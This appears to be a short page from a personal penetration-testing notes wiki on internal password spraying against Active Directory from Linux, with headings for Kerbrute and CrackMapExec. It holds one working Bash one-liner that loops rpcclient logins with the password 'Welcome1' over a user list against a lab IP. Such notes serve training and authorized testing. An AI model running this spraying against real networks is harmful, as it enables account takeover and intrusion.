Nathaniel Cyber Security

Internal Password Spraying - from Linux ACTIVE Directory

Using a Bash one-liner for the Attack

need valid_users.txt file
- Password Spraying - Making a Target User List ACTIVE Directory

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Copy

Using Kerbrute for the Attack

Password Spraying Active Directory

Using CrackMapExec & Filtering Logon Failures

Password Spraying Active Directory

Local Admin Spraying with CrackMapExec

Local Admin Spraying with CrackMapExec

Reference

https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/

Previouswindapsearch NextInternal Password Spraying - from Windows ACTIVE Directory

Last updated 10 months ago